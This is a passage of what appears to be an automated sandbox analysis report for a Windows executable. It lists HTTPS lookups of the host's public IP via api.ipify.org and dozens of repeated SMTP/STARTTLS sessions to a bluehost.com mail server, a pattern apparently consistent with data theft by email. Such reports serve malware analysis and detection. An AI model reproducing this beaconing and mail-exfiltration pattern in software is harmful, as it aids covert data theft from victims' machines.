                                                      Server: cloudflare
                                                      CF-RAY: 87a53a102f23a4c1-MIA
                                                      2024-04-26 08:33:14 UTC15INData Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                                      Data Ascii: 102.129.152.220


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.449755104.26.12.2054437752C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-26 08:33:21 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2024-04-26 08:33:22 UTC211INHTTP/1.1 200 OK
                                                      Date: Fri, 26 Apr 2024 08:33:22 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 15
                                                      Connection: close
                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 87a53a412cd77436-MIA
                                                      2024-04-26 08:33:22 UTC15INData Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                                      Data Ascii: 102.129.152.220


                                                      SMTP Packets

                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                      Apr 26, 2024 10:33:00.070991039 CEST5874973650.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:32:59 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:33:00.074568987 CEST49736587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:33:00.271383047 CEST5874973650.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:33:00.271923065 CEST49736587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:33:00.470662117 CEST5874973650.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:33:06.113437891 CEST5874973950.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:33:06 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:33:06.117778063 CEST49739587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:33:06.314546108 CEST5874973950.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:33:06.317152977 CEST49739587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:33:06.515319109 CEST5874973950.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:33:15.554121971 CEST5874975350.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:33:15 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:33:15.554326057 CEST49753587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:33:15.751154900 CEST5874975350.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:33:15.751425982 CEST49753587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:33:15.950134993 CEST5874975350.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:33:23.243947983 CEST5874975750.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:33:23 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:33:23.244153023 CEST49757587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:33:23.457655907 CEST5874975750.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:33:23.457859993 CEST49757587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:33:23.656215906 CEST5874975750.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:34:40.195323944 CEST5874975950.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:40 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:34:40.195552111 CEST49759587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:34:40.255414963 CEST5874976050.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:40 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:34:40.255625010 CEST49760587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:34:40.393052101 CEST5874975950.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:34:40.393222094 CEST49759587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:34:40.452086926 CEST5874976050.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:34:40.452255964 CEST49760587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:34:40.591851950 CEST5874975950.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:34:40.650135040 CEST5874976050.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:34:46.772742987 CEST5874976150.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:46 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:34:46.773036957 CEST49761587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:34:46.794117928 CEST5874976250.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:46 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:34:46.794332981 CEST49762587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:34:46.969957113 CEST5874976150.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:34:46.970149040 CEST49761587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:34:46.990200996 CEST5874976250.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:34:46.990319014 CEST49762587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:34:47.171823025 CEST5874976150.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:34:47.189968109 CEST5874976250.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:34:50.323384047 CEST5874976350.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:50 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:34:50.323631048 CEST49763587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:34:50.520364046 CEST5874976350.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:34:50.520539045 CEST49763587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:34:50.719587088 CEST5874976350.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:34:51.540391922 CEST5874976450.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:51 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:34:51.541019917 CEST49764587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:34:51.737519026 CEST5874976450.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:34:51.738224030 CEST49764587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:34:51.935959101 CEST5874976450.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:34:57.977706909 CEST5874976550.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:34:57 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:34:57.977869987 CEST49765587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:34:58.174664021 CEST5874976550.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:34:58.174841881 CEST49765587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:34:58.372922897 CEST5874976550.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:03.317862034 CEST5874976650.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:03 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:03.324615002 CEST49766587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:03.521177053 CEST5874976650.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:03.521544933 CEST49766587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:03.719501972 CEST5874976650.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:06.320000887 CEST5874976750.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:06 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:06.320156097 CEST49767587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:06.518642902 CEST5874976750.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:06.522763014 CEST49767587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:06.721072912 CEST5874976750.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:14.867494106 CEST5874976850.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:14 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:14.867705107 CEST49768587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:15.064642906 CEST5874976850.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:15.068703890 CEST49768587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:15.266855001 CEST5874976850.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:28.051446915 CEST5874976950.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:27 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:28.054642916 CEST49769587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:28.252288103 CEST5874976950.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:28.252629042 CEST49769587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:28.452194929 CEST5874976950.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:31.606662989 CEST5874977050.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:31 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:31.606829882 CEST49770587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:31.803644896 CEST5874977050.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:31.803786039 CEST49770587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:32.002747059 CEST5874977050.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:35.768610001 CEST5874977150.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:35 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:35.768754959 CEST49771587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:35.964926004 CEST5874977150.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:35.965078115 CEST49771587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:36.163014889 CEST5874977150.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:36.647352934 CEST5874977250.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:36 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:36.647501945 CEST49772587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:36.843811035 CEST5874977250.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:36.847058058 CEST49772587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:37.045042038 CEST5874977250.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:37.754841089 CEST5874977350.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:37 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:37.754966021 CEST49773587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:37.951975107 CEST5874977350.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:37.952109098 CEST49773587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:38.150494099 CEST5874977350.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:39.393001080 CEST5874977450.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:39 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:39.393163919 CEST49774587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:39.589946985 CEST5874977450.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:39.590140104 CEST49774587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:39.820218086 CEST5874977450.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:35:55.542357922 CEST5874977550.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:35:55 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:35:55.543216944 CEST49775587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:35:55.740255117 CEST5874977550.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:35:55.740693092 CEST49775587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:35:55.956368923 CEST5874977550.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:01.454304934 CEST5874977650.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:01 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:01.459032059 CEST49776587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:01.656028986 CEST5874977650.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:01.656389952 CEST49776587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:01.870546103 CEST5874977650.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:10.710277081 CEST5874977750.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:10 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:10.710474968 CEST49777587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:10.906841040 CEST5874977750.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:10.907222033 CEST49777587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:11.106486082 CEST5874977750.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:17.150849104 CEST5874977850.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:17 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:17.151319981 CEST49778587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:17.348068953 CEST5874977850.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:17.348181963 CEST49778587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:17.546612978 CEST5874977850.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:32.112770081 CEST5874977950.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:32 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:32.113012075 CEST49779587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:32.320796967 CEST5874977950.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:32.320986986 CEST49779587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:32.519685984 CEST5874977950.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:36.132191896 CEST5874978050.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:36 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:36.306034088 CEST49780587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:36.504277945 CEST5874978050.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:36.504723072 CEST49780587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:36.702572107 CEST5874978050.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:47.447623968 CEST5874978150.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:47 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:47.447979927 CEST49781587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:47.644378901 CEST5874978150.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:47.644668102 CEST49781587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:47.842349052 CEST5874978150.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:51.603967905 CEST5874978250.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:51 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:51.604675055 CEST49782587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:51.712610006 CEST5874978350.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:51 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:51.714802980 CEST49783587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:51.800863981 CEST5874978250.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:51.802799940 CEST49782587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:51.911451101 CEST5874978350.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:51.911760092 CEST49783587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:52.000360966 CEST5874978250.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:52.109939098 CEST5874978350.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:36:52.896142006 CEST5874978350.87.195.61192.168.2.4421 box2344.bluehost.com lost input connection
                                                      Apr 26, 2024 10:36:53.210360050 CEST5874978450.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:53 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:36:53.210480928 CEST49784587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:53.410368919 CEST5874978450.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:53.412219048 CEST5874978450.87.195.61192.168.2.4421 box2344.bluehost.com lost input connection
                                                      Apr 26, 2024 10:36:53.708465099 CEST5874978550.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:36:53 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
